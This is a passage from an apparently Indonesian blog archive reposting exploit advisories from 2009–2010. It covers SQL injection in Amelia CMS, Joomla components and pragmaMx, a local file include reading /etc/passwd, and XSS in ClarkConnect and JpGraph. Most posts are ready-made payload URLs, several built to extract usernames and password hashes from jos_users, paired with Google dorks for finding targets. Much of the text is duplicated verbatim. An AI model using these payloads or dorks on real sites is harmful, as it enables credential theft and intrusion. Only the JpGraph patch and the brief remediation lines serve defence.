# Title: [SQL injection vulnerability in Amelia CMS]
# Date: [10.02.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.ameliadesign.eu/]
# Version: [ALL]
# Tested on: [freebsd / ubuntu]
============ { Ariko-Security - Advisory #3/2/2010 } =============
SQL injection vulnerability in Amelia CMS
Vendor's Description of Software:
# http://www.ameliadesign.eu/index.php?page=1322〈=eng&cnt=services
Dork:
# N/A
Application Info:
# Name: Amelia CMS
# Versions: ALL
Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: High
Fix:
# N/A
Time Table
# 10/02/2009 - Vendor notified.
Input passed via the "page" parameter to index.php is not properly
sanitised before being used in a SQL query and it is possible to get
sensitive information using for example Time-Base Blind SQL Injection
attacks.
Solution:
# Input validation of "page" parameter should be corrected.
Vulnerability:
# http://www.[site]/index.php?page=1322[SQLi]〈=eng&cnt=services
Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
Advisory:
#http://www.ariko-security.com/feb2010/ad453.html
# Contacts: support[-at-]ariko-security.com
Tampilkan postingan dengan label exploit. Tampilkan semua postingan
Tampilkan postingan dengan label exploit. Tampilkan semua postingan
Sabtu, 20 Februari 2010
Jumat, 01 Januari 2010
Joomla! 'com_countries' Component 'locat' Parameter SQL Injection Vulnerability
http://www.example.com/index.php?option=com_countries&locat=null/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users
'com_abbrev' Joomla! Component 'controller' Parameter Local File Include Vulnerability
http://www.example.com/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd
Minggu, 27 Desember 2009
pragmaMx CMS Blind SQL/XPath Injection vulnerability
###########################################
#
# CMS Name : pragmaMx ( All Version )
#
# Bug Type : Blind SQL/XPath Injection vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/
pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download
#
###########################################
PoC :
http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+an
d+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]
http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD
"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://[target]/[path]/modules.php?name=Your_Account&op=pass_lost&query=
111-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD
http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent&id=
111-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
example :
http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+an
d+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]
http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD
"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=
111-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD
http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=
111-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
local Example :
http://localhost/html/modules.php?name=Your_Account&rop=showcontent"+and
+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]
http://localhost/html/modules.php?name=Your_Account&min=0&orderby=dateD"
+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://localhost/html/modules.php?name=Your_Account&op=pass_lost&query=1
11-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD
http://localhost/html/modules.php?name=Your_Account&rop=showcontent&id=1
11-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
#
# CMS Name : pragmaMx ( All Version )
#
# Bug Type : Blind SQL/XPath Injection vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/
pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download
#
###########################################
PoC :
http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+an
d+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]
http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD
"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://[target]/[path]/modules.php?name=Your_Account&op=pass_lost&query=
111-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD
http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent&id=
111-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
example :
http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+an
d+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]
http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD
"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=
111-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD
http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=
111-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
local Example :
http://localhost/html/modules.php?name=Your_Account&rop=showcontent"+and
+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]
http://localhost/html/modules.php?name=Your_Account&min=0&orderby=dateD"
+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://localhost/html/modules.php?name=Your_Account&op=pass_lost&query=1
11-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD
http://localhost/html/modules.php?name=Your_Account&rop=showcontent&id=1
11-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
XSS vulnerability in ClarkConnect web interface.
XSS vulnerability in ClarkConnect web interface.
ClarkConnect is an internet server and gateway that provides protocol filtering, bandwidth management, Windows File Sharing / Samba, LDAP Directory Integration and other features...
The vulnerability was found in the latest version of this product (5.0).
ClarkConnect installs a Web server on port 82 to process the PHP scripts it uses for configuration.
Proof of concept:
http://server_address:82/public/proxy.php?url=
ClarkConnect is an internet server and gateway that provides protocol filtering, bandwidth management, Windows File Sharing / Samba, LDAP Directory Integration and other features...
The vulnerability was found in the latest version of this product (5.0).
ClarkConnect installs a Web server on port 82 to process the PHP scripts it uses for configuration.
Proof of concept:
http://server_address:82/public/proxy.php?url=
XSS Vulnerability in JpGraph 3.0.6
Discovered by Martin Barbella
Description of Vulnerability:
-----------------------------
JpGraph is an object oriented library for PHP that can be used to create
various types of graphs which also contains support for client side
image maps.
The GetURLArguments function for the JpGraph's Graph class does not
properly sanitize the names of get and post variables, leading to a
cross site scripting vulnerability.
Systems affected:
-----------------
This has been confirmed in version 3.0.6 of JpGraph's free release.
Previous versions and the professional versions may be affected as well.
Impact:
-------
When a user is tricked into clicking on a malicious link or submitting a
specially crafted form, the injected code travels to the vulnerable web
server, which reflects the attack back to the userâ??s browser. The
browser then executes the code because it came from a "trusted" server.
(From OWASP: http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29)
Mitigating factors:
-------------------
The vulnerability seems to be exploitable only in cases where client
side image maps are used.
Proof of concept:
-----------------
This can be demonstrated in the csim_in_html_ex1.php example provided
with jpgraph (as well various other csim examples) as shown below.
http://site/csim_in_html_ex1.php?"/>=arbitr
ary
Solution:
---------
The following patch can be applied to jpgraph.php to correct the
vulnerability.
--- jpgraph.php.orig 2009-11-14 14:45:01.000000000 -0500
+++ jpgraph.php 2009-11-14 14:55:34.000000000 -0500
@@ -1286,11 +1286,11 @@
while( list($key,$value) = each($_GET) ) {
if( is_array($value) ) {
foreach ( $value as $k => $v ) {
- $urlarg .= '&'.$key.'%5B'.$k.'%5D='.urlencode($v);
+ $urlarg .=
'&'.urlencode($key).'%5B'.urlencode($k).'%5D='.urlencode($v);
}
}
else {
- $urlarg .= '&'.$key.'='.urlencode($value);
+ $urlarg .= '&'.urlencode($key).'='.urlencode($value);
}
}
@@ -1301,11 +1301,11 @@
while( list($key,$value) = each($_POST) ) {
if( is_array($value) ) {
foreach ( $value as $k => $v ) {
- $urlarg .= '&'.$key.'%5B'.$k.'%5D='.urlencode($v);
+ $urlarg .=
'&'.urlencode($key).'%5B'.urlencode($k).'%5D='.urlencode($v);
}
}
else {
- $urlarg .= '&'.$key.'='.urlencode($value);
+ $urlarg .= '&'.urlencode($key).'='.urlencode($value);
}
}
Description of Vulnerability:
-----------------------------
JpGraph is an object oriented library for PHP that can be used to create
various types of graphs which also contains support for client side
image maps.
The GetURLArguments function for the JpGraph's Graph class does not
properly sanitize the names of get and post variables, leading to a
cross site scripting vulnerability.
Systems affected:
-----------------
This has been confirmed in version 3.0.6 of JpGraph's free release.
Previous versions and the professional versions may be affected as well.
Impact:
-------
When a user is tricked into clicking on a malicious link or submitting a
specially crafted form, the injected code travels to the vulnerable web
server, which reflects the attack back to the userâ??s browser. The
browser then executes the code because it came from a "trusted" server.
(From OWASP: http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29)
Mitigating factors:
-------------------
The vulnerability seems to be exploitable only in cases where client
side image maps are used.
Proof of concept:
-----------------
This can be demonstrated in the csim_in_html_ex1.php example provided
with jpgraph (as well various other csim examples) as shown below.
http://site/csim_in_html_ex1.php?"/>=arbitr
ary
Solution:
---------
The following patch can be applied to jpgraph.php to correct the
vulnerability.
--- jpgraph.php.orig 2009-11-14 14:45:01.000000000 -0500
+++ jpgraph.php 2009-11-14 14:55:34.000000000 -0500
@@ -1286,11 +1286,11 @@
while( list($key,$value) = each($_GET) ) {
if( is_array($value) ) {
foreach ( $value as $k => $v ) {
- $urlarg .= '&'.$key.'%5B'.$k.'%5D='.urlencode($v);
+ $urlarg .=
'&'.urlencode($key).'%5B'.urlencode($k).'%5D='.urlencode($v);
}
}
else {
- $urlarg .= '&'.$key.'='.urlencode($value);
+ $urlarg .= '&'.urlencode($key).'='.urlencode($value);
}
}
@@ -1301,11 +1301,11 @@
while( list($key,$value) = each($_POST) ) {
if( is_array($value) ) {
foreach ( $value as $k => $v ) {
- $urlarg .= '&'.$key.'%5B'.$k.'%5D='.urlencode($v);
+ $urlarg .=
'&'.urlencode($key).'%5B'.urlencode($k).'%5D='.urlencode($v);
}
}
else {
- $urlarg .= '&'.$key.'='.urlencode($value);
+ $urlarg .= '&'.urlencode($key).'='.urlencode($value);
}
}
Selasa, 24 November 2009
Joomla! and Mambo Community Builder 'com_profiler' Component SQL Injection Vulnerability
Joomla! and Mambo Community Builder 'com_profiler' Component SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Dork: inurl: "com_comprofiler"
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Dork: inurl: "com_comprofiler"
Langganan:
Postingan (Atom)